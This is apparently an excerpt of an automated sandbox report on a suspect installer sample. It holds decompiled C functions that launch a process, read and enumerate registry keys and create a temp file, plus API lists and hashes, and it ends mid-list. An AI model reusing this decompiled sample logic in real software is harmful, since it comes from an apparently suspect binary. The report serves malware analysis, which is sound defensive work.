                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040683e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040683e
                                                                                                                                                                            0x0040683c
                                                                                                                                                                            0x004067c2
                                                                                                                                                                            0x004067c5
                                                                                                                                                                            0x004067c7
                                                                                                                                                                            0x004067ca
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406529
                                                                                                                                                                            0x00406529
                                                                                                                                                                            0x0040652d
                                                                                                                                                                            0x00406b72
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b72
                                                                                                                                                                            0x00406533
                                                                                                                                                                            0x00406536
                                                                                                                                                                            0x00406539
                                                                                                                                                                            0x0040653c
                                                                                                                                                                            0x0040653f
                                                                                                                                                                            0x00406542
                                                                                                                                                                            0x00406545
                                                                                                                                                                            0x00406547
                                                                                                                                                                            0x0040654a
                                                                                                                                                                            0x0040654d
                                                                                                                                                                            0x00406550
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00406552
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004066b4
                                                                                                                                                                            0x004066b4
                                                                                                                                                                            0x004066b8
                                                                                                                                                                            0x00406b7e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b7e
                                                                                                                                                                            0x004066be
                                                                                                                                                                            0x004066c1
                                                                                                                                                                            0x004066c4
                                                                                                                                                                            0x004066c7
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066c9
                                                                                                                                                                            0x004066cc
                                                                                                                                                                            0x004066cf
                                                                                                                                                                            0x004066d2
                                                                                                                                                                            0x004066d5
                                                                                                                                                                            0x004066d8
                                                                                                                                                                            0x004066db
                                                                                                                                                                            0x004066dc
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066de
                                                                                                                                                                            0x004066e1
                                                                                                                                                                            0x004066e4
                                                                                                                                                                            0x004066e7
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ea
                                                                                                                                                                            0x004066ed
                                                                                                                                                                            0x004066ef
                                                                                                                                                                            0x004066ef
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406931
                                                                                                                                                                            0x00406935
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040693b
                                                                                                                                                                            0x0040693e
                                                                                                                                                                            0x00406941
                                                                                                                                                                            0x00406944
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406946
                                                                                                                                                                            0x00406949
                                                                                                                                                                            0x0040694c
                                                                                                                                                                            0x0040694f
                                                                                                                                                                            0x00406952
                                                                                                                                                                            0x00406955
                                                                                                                                                                            0x00406958
                                                                                                                                                                            0x00406959
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695b
                                                                                                                                                                            0x0040695e
                                                                                                                                                                            0x00406961
                                                                                                                                                                            0x00406964
                                                                                                                                                                            0x00406967
                                                                                                                                                                            0x0040696a
                                                                                                                                                                            0x0040696e
                                                                                                                                                                            0x00406970
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406975
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004066f2
                                                                                                                                                                            0x00406973
                                                                                                                                                                            0x00406ba8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061d7
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406bdf
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x004069b3
                                                                                                                                                                            0x004069b0

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1b21a4910564614c6641403ac362d6aa440f40f6368f9ee5d1983abbc3d5a3b8
                                                                                                                                                                            • Instruction ID: 94740bf10ed9628fc2a816943eb7322e71ed29eec5e37d1a6fe0f7c23d4f3e83
                                                                                                                                                                            • Opcode Fuzzy Hash: 1b21a4910564614c6641403ac362d6aa440f40f6368f9ee5d1983abbc3d5a3b8
                                                                                                                                                                            • Instruction Fuzzy Hash: 1D714571E04228CBDF28CF98C854BADBBB1FB44305F11806ED856BB281C7786A96DF44
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                            			E00401E44() {
                                                                                                                                                                            				void* _t15;
                                                                                                                                                                            				void* _t24;
                                                                                                                                                                            				void* _t26;
                                                                                                                                                                            				void* _t31;
                                                                                                                                                                            
                                                                                                                                                                            				_t28 = E00402A3A(_t24);
                                                                                                                                                                            				E00404F12(0xffffffeb, _t13);
                                                                                                                                                                            				_t15 = E0040548A(_t28); // executed
                                                                                                                                                                            				 *(_t31 + 8) = _t15;
                                                                                                                                                                            				if(_t15 == _t24) {
                                                                                                                                                                            					 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
                                                                                                                                                                            						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                                                                                                                                                                            							E004060CE(0xf);
                                                                                                                                                                            						}
                                                                                                                                                                            						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc);
                                                                                                                                                                            						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
                                                                                                                                                                            							if( *(_t31 - 0xc) != _t24) {
                                                                                                                                                                            								 *((intOrPtr*)(_t31 - 4)) = 1;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E00405C57(_t26,  *(_t31 - 0xc));
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_push( *(_t31 + 8));
                                                                                                                                                                            					CloseHandle();
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t31 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}







                                                                                                                                                                            0x00401e4a
                                                                                                                                                                            0x00401e4f
                                                                                                                                                                            0x00401e55
                                                                                                                                                                            0x00401e5c
                                                                                                                                                                            0x00401e5f
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x00401e65
                                                                                                                                                                            0x00401e68
                                                                                                                                                                            0x00401e79
                                                                                                                                                                            0x00401e74
                                                                                                                                                                            0x00401e74
                                                                                                                                                                            0x00401e8e
                                                                                                                                                                            0x00401e97
                                                                                                                                                                            0x00401ea7
                                                                                                                                                                            0x00401ea9
                                                                                                                                                                            0x00401ea9
                                                                                                                                                                            0x00401e99
                                                                                                                                                                            0x00401e9d
                                                                                                                                                                            0x00401e9d
                                                                                                                                                                            0x00401e97
                                                                                                                                                                            0x00401eb0
                                                                                                                                                                            0x00401eb3
                                                                                                                                                                            0x00401eb3
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00404F12: lstrlenA.KERNEL32(0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
                                                                                                                                                                              • Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
                                                                                                                                                                              • Part of subcall function 00404F12: lstrcatA.KERNEL32(0041F4E8,00402FCF,00402FCF,0041F4E8,00000000,0040E8C0,00000000), ref: 00404F6E
                                                                                                                                                                              • Part of subcall function 00404F12: SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 00404F80
                                                                                                                                                                              • Part of subcall function 00404F12: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
                                                                                                                                                                              • Part of subcall function 00404F12: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
                                                                                                                                                                              • Part of subcall function 00404F12: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE
                                                                                                                                                                              • Part of subcall function 0040548A: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004054B3
                                                                                                                                                                              • Part of subcall function 0040548A: CloseHandle.KERNEL32(?), ref: 004054C0
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3521207402-0
                                                                                                                                                                            • Opcode ID: 49e7ed0533c3ddddde98bc85c632754f8ae4837d9813caa7016193d92f337056
                                                                                                                                                                            • Instruction ID: 49f7d359c4d218189077cc8fb8a526ed56d4096950e75cb47e310611910bd6fc
                                                                                                                                                                            • Opcode Fuzzy Hash: 49e7ed0533c3ddddde98bc85c632754f8ae4837d9813caa7016193d92f337056
                                                                                                                                                                            • Instruction Fuzzy Hash: C4016D31904104EBDF11AFA1C984A9E77B2EF00354F10817BFA01B52E1C7785A85AB9A
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E00405BE0(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
                                                                                                                                                                            				long _t20;
                                                                                                                                                                            				long _t23;
                                                                                                                                                                            				long _t24;
                                                                                                                                                                            				char* _t26;
                                                                                                                                                                            
                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                            				_t26 = _a16;
                                                                                                                                                                            				 *_t26 = 0;
                                                                                                                                                                            				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                                                                                                                            				if(_t20 == 0) {
                                                                                                                                                                            					_a8 = 0x400;
                                                                                                                                                                            					_t23 = RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
                                                                                                                                                                            					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
                                                                                                                                                                            						 *_t26 = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t26[0x3ff] = 0;
                                                                                                                                                                            					_t24 = RegCloseKey(_a20); // executed
                                                                                                                                                                            					return _t24;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t20;
                                                                                                                                                                            			}







                                                                                                                                                                            0x00405bf0
                                                                                                                                                                            0x00405bf2
                                                                                                                                                                            0x00405bff
                                                                                                                                                                            0x00405c09
                                                                                                                                                                            0x00405c11
                                                                                                                                                                            0x00405c16
                                                                                                                                                                            0x00405c2a
                                                                                                                                                                            0x00405c32
                                                                                                                                                                            0x00405c40
                                                                                                                                                                            0x00405c40
                                                                                                                                                                            0x00405c45
                                                                                                                                                                            0x00405c4b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405c4b
                                                                                                                                                                            0x00405c54

                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,00405E25,00000000,00000002,?,00000002,?,?,00405E25,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C09
                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00405E25,?,00405E25), ref: 00405C2A
                                                                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00405C4B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                                                            • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                                                                                                            • Instruction ID: c16e3abce3e86e16c1a4588743a1117629dce573bc303fe916445e4d8ee7e6e7
                                                                                                                                                                            • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                                                                                                            • Instruction Fuzzy Hash: B3015A7254420AEFEB128F64EC49EEB3FACEF14354F044036F944A6220D235D964DFA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                            			E00402482(int* __ebx, char* __esi) {
                                                                                                                                                                            				void* _t7;
                                                                                                                                                                            				int _t8;
                                                                                                                                                                            				long _t11;
                                                                                                                                                                            				int* _t14;
                                                                                                                                                                            				void* _t18;
                                                                                                                                                                            				char* _t20;
                                                                                                                                                                            				void* _t22;
                                                                                                                                                                            				void* _t25;
                                                                                                                                                                            
                                                                                                                                                                            				_t20 = __esi;
                                                                                                                                                                            				_t14 = __ebx;
                                                                                                                                                                            				_t7 = E00402B44(_t25, 0x20019); // executed
                                                                                                                                                                            				_t18 = _t7;
                                                                                                                                                                            				_t8 = E00402A1D(3);
                                                                                                                                                                            				 *__esi = __ebx;
                                                                                                                                                                            				if(_t18 == __ebx) {
                                                                                                                                                                            					L7:
                                                                                                                                                                            					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					 *(_t22 + 8) = 0x3ff;
                                                                                                                                                                            					if( *((intOrPtr*)(_t22 - 0x18)) == __ebx) {
                                                                                                                                                                            						_t11 = RegEnumValueA(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx); // executed
                                                                                                                                                                            						__eflags = _t11;
                                                                                                                                                                            						if(_t11 != 0) {
                                                                                                                                                                            							goto L7;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							goto L4;
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						RegEnumKeyA(_t18, _t8, __esi, 0x3ff); // executed
                                                                                                                                                                            						L4:
                                                                                                                                                                            						_t20[0x3ff] = _t14;
                                                                                                                                                                            						_push(_t18); // executed
                                                                                                                                                                            						RegCloseKey(); // executed
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t22 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}











                                                                                                                                                                            0x00402482
                                                                                                                                                                            0x00402482
                                                                                                                                                                            0x00402487
                                                                                                                                                                            0x0040248e
                                                                                                                                                                            0x00402490
                                                                                                                                                                            0x00402497
                                                                                                                                                                            0x00402499
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x0040249f
                                                                                                                                                                            0x004024a7
                                                                                                                                                                            0x004024aa
                                                                                                                                                                            0x004024c3
                                                                                                                                                                            0x004024c9
                                                                                                                                                                            0x004024cb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004024ac
                                                                                                                                                                            0x004024b0
                                                                                                                                                                            0x004024d1
                                                                                                                                                                            0x004024d1
                                                                                                                                                                            0x004024d7
                                                                                                                                                                            0x004024d8
                                                                                                                                                                            0x004024d8
                                                                                                                                                                            0x004024aa
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,00000270,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                            • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                                                                                                                                            • RegEnumValueA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Enum$CloseOpenValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 167947723-0
                                                                                                                                                                            • Opcode ID: 081feed79697e1e5fb5dc3aba588dec9fcfdfd45edaf8ed89b32f200e3f9be0f
                                                                                                                                                                            • Instruction ID: 070e1f6e5a6b9be8feed57f98e06303e5303b2278279fcdfa1a0cb603d5e6ac6
                                                                                                                                                                            • Opcode Fuzzy Hash: 081feed79697e1e5fb5dc3aba588dec9fcfdfd45edaf8ed89b32f200e3f9be0f
                                                                                                                                                                            • Instruction Fuzzy Hash: D3F0A272904100BFEB119F659D88E7B7A6DEB40344B10443EF505A61C0D6B849459A7A
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000), ref: 100028A7
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 100029AE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1202605160.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1202572962.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202644162.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202672082.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateErrorFileLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1214770103-0
                                                                                                                                                                            • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                                                                                            • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                                                                                                                            • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                                                                                            • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                            			E00402410(int* __ebx, char* __esi) {
                                                                                                                                                                            				char* _t18;
                                                                                                                                                                            				void* _t33;
                                                                                                                                                                            				void* _t37;
                                                                                                                                                                            				void* _t40;
                                                                                                                                                                            
                                                                                                                                                                            				_t35 = __esi;
                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                            				_t33 = E00402B44(_t40, 0x20019);
                                                                                                                                                                            				_t18 = E00402A3A(0x33);
                                                                                                                                                                            				 *__esi = __ebx;
                                                                                                                                                                            				if(_t33 == __ebx) {
                                                                                                                                                                            					 *(_t37 - 4) = 1;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					 *(_t37 - 0x34) = 0x400;
                                                                                                                                                                            					if(RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x34) != 0) {
                                                                                                                                                                            						L7:
                                                                                                                                                                            						 *_t35 = _t27;
                                                                                                                                                                            						 *(_t37 - 4) = 1;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						if( *(_t37 + 8) == 4) {
                                                                                                                                                                            							__eflags =  *(_t37 - 0x18) - __ebx;
                                                                                                                                                                            							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
                                                                                                                                                                            							E00405C57(__esi,  *__esi);
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                                                                                                            								 *(_t37 - 4) =  *(_t37 - 0x18);
                                                                                                                                                                            								_t35[0x3ff] = _t27;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L7;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(_t33); // executed
                                                                                                                                                                            					RegCloseKey(); // executed
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *(_t37 - 4);
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}







                                                                                                                                                                            0x00402410
                                                                                                                                                                            0x00402410
                                                                                                                                                                            0x0040241c
                                                                                                                                                                            0x0040241e
                                                                                                                                                                            0x00402425
                                                                                                                                                                            0x00402427
                                                                                                                                                                            0x004026a6
                                                                                                                                                                            0x0040242d
                                                                                                                                                                            0x00402430
                                                                                                                                                                            0x0040244b
                                                                                                                                                                            0x0040247b
                                                                                                                                                                            0x0040247b
                                                                                                                                                                            0x0040247d
                                                                                                                                                                            0x0040244d
                                                                                                                                                                            0x00402451
                                                                                                                                                                            0x0040246a
                                                                                                                                                                            0x00402471
                                                                                                                                                                            0x00402474
                                                                                                                                                                            0x00402453
                                                                                                                                                                            0x00402456
                                                                                                                                                                            0x00402461
                                                                                                                                                                            0x004024d1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402456
                                                                                                                                                                            0x00402451
                                                                                                                                                                            0x004024d7
                                                                                                                                                                            0x004024d8
                                                                                                                                                                            0x004024d8
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,00000270,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
